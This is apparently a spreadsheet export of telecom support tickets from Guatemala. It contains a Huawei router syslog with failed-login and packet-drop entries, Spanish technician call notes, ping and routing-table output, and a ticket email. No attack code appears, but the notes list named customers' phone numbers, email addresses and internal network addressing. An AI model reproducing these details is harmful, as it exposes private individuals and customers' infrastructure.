JAN  5 2019 07:03:53+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[50]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JAN  5 2019 06:54:42+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[51]:FAILED TO LOGIN. (IP=181.209.88.138, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 06:53:52+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[52]:FAILED TO LOGIN. (IP=103.90.237.244, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 06:53:19+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[53]:FAILED TO LOGIN. (IP=103.139.225.242, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 06:33:23+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01DEFD/4/CPCAR_DROP_MPU(L)[54]:SOME PACKETS ARE DROPPED BY CPCAR ON THE MPU. (PACKET-TYPE=TELNET-CLIENT, DROP-COUNT=64)
JAN  5 2019 06:30:40+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[55]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JAN  5 2019 06:30:33+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[56]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JAN  5 2019 06:29:52+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[57]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  5 2019 06:29:47+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[58]:FAILED TO LOGIN. (IP=183.96.58.168, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 06:29:46+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[59]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  5 2019 06:29:46+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[60]:FAILED TO LOGIN. (IP=183.96.58.168, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 06:29:23+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[61]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  5 2019 06:29:21+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[62]:FAILED TO LOGIN. (IP=86.155.156.107, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 06:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[63]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 06:23:26+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[64]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JAN  5 2019 06:23:24+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[65]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=18)
JAN  5 2019 05:51:31+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[66]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JAN  5 2019 05:46:50+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[67]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JAN  5 2019 05:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[68]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 04:52:09+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[69]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  5 2019 04:52:04+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[70]:FAILED TO LOGIN. (IP=45.224.168.105, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 04:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[71]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 04:23:23+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01DEFD/4/CPCAR_DROP_MPU(L)[72]:SOME PACKETS ARE DROPPED BY CPCAR ON THE MPU. (PACKET-TYPE=TCP, DROP-COUNT=10691)
JAN  5 2019 03:43:23+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01DEFD/4/CPCAR_DROP_MPU(L)[73]:SOME PACKETS ARE DROPPED BY CPCAR ON THE MPU. (PACKET-TYPE=TCP, DROP-COUNT=34)
JAN  5 2019 03:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[74]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 03:23:23+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01DEFD/4/CPCAR_DROP_MPU(L)[75]:SOME PACKETS ARE DROPPED BY CPCAR ON THE MPU. (PACKET-TYPE=TCP, DROP-COUNT=49)
JAN  5 2019 03:12:46+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[76]:FAILED TO LOGIN. (IP=84.53.198.24, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 03:08:38+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[77]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JAN  5 2019 03:08:11+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[78]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
JAN  5 2019 03:04:49+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[79]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JAN  5 2019 03:03:50+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[80]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
JAN  5 2019 02:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[81]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 02:23:23+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01DEFD/4/CPCAR_DROP_MPU(L)[82]:SOME PACKETS ARE DROPPED BY CPCAR ON THE MPU. (PACKET-TYPE=ARP-MISS, DROP-COUNT=922)
JAN  5 2019 02:06:32+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[83]:LAST MESSAGE REPEATED 17 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  5 2019 02:06:22+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[84]:FAILED TO LOGIN. (IP=14.50.150.25, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 02:06:21+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[85]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  5 2019 02:06:20+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[86]:FAILED TO LOGIN. (IP=14.50.150.25, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 01:53:23+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01DEFD/4/CPCAR_DROP_MPU(L)[87]:SOME PACKETS ARE DROPPED BY CPCAR ON THE MPU. (PACKET-TYPE=TCP, DROP-COUNT=148288)
JAN  5 2019 01:53:23+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01DEFD/4/CPCAR_DROP_MPU(L)[88]:SOME PACKETS ARE DROPPED BY CPCAR ON THE MPU. (PACKET-TYPE=ARP-MISS, DROP-COUNT=61)
JAN  5 2019 01:33:23+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01DEFD/4/CPCAR_DROP_MPU(L)[89]:SOME PACKETS ARE DROPPED BY CPCAR ON THE MPU. (PACKET-TYPE=ARP-MISS, DROP-COUNT=59)
JAN  5 2019 01:24:50+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[90]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  5 2019 01:24:47+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[91]:FAILED TO LOGIN. (IP=124.152.185.167, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 01:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[92]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 01:16:18+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[93]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  5 2019 01:15:49+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[94]:FAILED TO LOGIN. (IP=124.152.185.167, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 01:15:10+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[95]:FAILED TO LOGIN. (IP=181.209.88.141, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 01:15:06+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[96]:FAILED TO LOGIN. (IP=124.152.185.167, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 00:35:57+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[97]:FAILED TO LOGIN. (IP=149.57.128.125, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 00:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[98]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  4 2019 23:33:23+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01DEFD/4/CPCAR_DROP_MPU(L)[99]:SOME PACKETS ARE DROPPED BY CPCAR ON THE MPU. (PACKET-TYPE=ARP-MISS, DROP-COUNT=120)
JAN  4 2019 23:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[100]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  4 2019 23:03:23+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01DEFD/4/CPCAR_DROP_MPU(L)[101]:SOME PACKETS ARE DROPPED BY CPCAR ON THE MPU. (PACKET-TYPE=ARP-MISS, DROP-COUNT=39)
JAN  4 2019 22:39:04+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[102]:LAST MESSAGE REPEATED 5 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  4 2019 22:39:01+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[103]:FAILED TO LOGIN. (IP=220.117.30.184, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 22:39:00+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[104]:FAILED TO LOGIN. (IP=181.209.88.141, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 22:39:00+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[105]:LAST MESSAGE REPEATED 5 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  4 2019 22:38:58+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[106]:FAILED TO LOGIN. (IP=220.117.30.184, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 22:38:57+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[107]:FAILED TO LOGIN. (IP=58.219.232.191, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 22:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[108]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  4 2019 22:21:01+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[109]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JAN  4 2019 22:20:45+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[110]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JAN  4 2019 22:18:35+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[111]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JAN  4 2019 22:18:26+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[112]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JAN  4 2019 22:04:58+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[113]:FAILED TO LOGIN. (IP=181.209.88.142, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 22:03:34+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[114]:FAILED TO LOGIN. (IP=124.152.185.167, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 21:24:56+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[115]:FAILED TO LOGIN. (IP=124.152.185.167, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 21:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[116]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  4 2019 21:22:46+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[117]:FAILED TO LOGIN. (IP=124.152.185.167, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 21:22:19+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[118]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  4 2019 21:22:14+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[119]:FAILED TO LOGIN. (IP=125.24.161.119, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 21:22:14+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[120]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  4 2019 21:22:12+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[121]:FAILED TO LOGIN. (IP=125.24.161.119, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 21:07:49+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[122]:LAST MESSAGE REPEATED 24 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  4 2019 21:07:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[123]:FAILED TO LOGIN. (IP=49.192.199.219, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 21:04:51+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[124]:FAILED TO LOGIN. (IP=181.209.88.138, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 21:04:34+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[125]:FAILED TO LOGIN. (IP=181.209.88.141, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 21:01:17+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[126]:FAILED TO LOGIN. (IP=181.209.88.140, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 21:00:19+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[127]:FAILED TO LOGIN. (IP=170.244.190.193, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 21:00:12+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[128]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  4 2019 21:00:11+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[129]:FAILED TO LOGIN. (IP=75.128.162.183, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 20:57:11+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[130]:FAILED TO LOGIN. (IP=120.85.114.247, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 20:56:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[131]:FAILED TO LOGIN. (IP=181.209.88.139, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  4 2019 20:56:22+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[132]:FAILED TO </t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911  PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001066347</t>
  </si>
  <si>
    <t>F4576434</t>
  </si>
  <si>
    <t>ENALCE OPERATIVO POR PARTE DE CLARO SE PROCEDE CON CIERRE DE TTK
&lt;NSRLSVZ6N1D1EID1&gt;PIN -VP  INTERNET_ID_ESV 10.152.72.97
  PING 10.152.72.97: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.152.72.97: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.152.72.97: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.152.72.97: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.152.72.97: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.152.72.97: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.152.72.97 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;NSRLSVZ6N1D1EID1&gt;
PE 10.179.30.100
&lt;NSRLSVZ6N1D1EID1&gt;DIS CUR | INCLUDE 10.152.72.97
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
IP ROUTE-STATIC VPN-INSTANCE INTERNET_ID_ESV 10.166.7.245 255.255.255.255 10.152.72.97 DESCRIPTION ID1221007/NOC
IP ROUTE-STATIC VPN-INSTANCE INTERNET_ID_ESV 190.86.175.52 255.255.255.252 10.152.72.97 DESCRIPTION ID1221007/GMG-ANAMOROS-T8/NO-CSC003400-ME3
&lt;NSRLSVZ6N1D1EID1&gt;DIS CIP ROUTI
&lt;NSRLSVZ6N1D1EID1&gt;DIS IP ROUTI
&lt;NSRLSVZ6N1D1EID1&gt;DIS IP ROUTING-TABLE  INTERNET_ID_ESV 10.152.72.97
                                        ^
ERROR: WRONG PARAMETER FOUND AT '^' POSITION.
&lt;NSRLSVZ6N1D1EID1&gt;DIS IP ROUTING-TABLE VP  INTERNET_ID_ESV 10.152.72.97
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_ID_ESV
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.152.72.97/32  DIRECT  0    0                 0.0.0.0         VLANIF1038
&lt;NSRLSVZ6N1D1EID1&gt;DIS CUR INTER VLANIF1038
#
INTERFACE VLANIF1038
 DESCRIPTION PRADO GMG - T8 /6M
 IP BINDING VPN-INSTANCE INTERNET_ID_ESV
 IP ADDRESS 10.152.72.98 255.255.255.252
#
RETURN
&lt;NSRLSVZ6N1D1EID1&gt;PIN -VP  INTERNET_ID_ESV 10.152.72.97
  PING 10.152.72.97: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.152.72.97: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.152.72.97: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.152.72.97: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.152.72.97: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.152.72.97: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.152.72.97 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;NSRLSVZ6N1D1EID1&gt;</t>
  </si>
  <si>
    <t>F4576460</t>
  </si>
  <si>
    <t>SE ¿PROCEDE A DEJAR EN ETAPA PENDIENTE CLIENTE SOLICITANDO CONTACTO EN PUNTO REMOTO
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 0:57
PARA: SOPORTEOPERACIONESIT@BANCOPROMERICA.COM.GT &lt;SOPORTEOPERACIONESIT@BANCOPROMERICA.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SEGUIMIENTO TTK SD1128852
ESTIMADO CLIENTE  ES NECESARIO REALIZAR PRUEBAS EN EL EQUIPO CPE Y LOS EQUIPO ULTIMA MILLA PARA PODER DARLE SEGUIMIENTO AL TICKET SD1128852 YA QUE SEGÚN EL PROCEDIMIENTO SE TIENE QUE VALIDAR EQUIPOS DE 1ER NIVEL DESCARTES DE INDICADORES Y CONEXIONES FÍSICAS.</t>
  </si>
  <si>
    <t>SE LLAMA A ENCARGADO DE AGENCIA 24139090 EXT 82610 A LA 82613 ID: 2001092201 / 2001092988
NO CONECTA LA LLAMADA, SE LLAMA A CENTRALES, VICTOR GIRON 30727797 ID: 2001093272 | 2001093378
ATIENDE WALTER AROCHE, COMENTA QUE EL SERVICIO YA ESTA OK, SOLICITA MONITOREO POR 24 HRS, SE NOTIFICA A RAMOS.MARLON VIA SKYPE PARA EL MOVIMIENTO DE ETAPA | WIP</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR GIRON 30727797 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001323043</t>
  </si>
  <si>
    <t>F4576477</t>
  </si>
  <si>
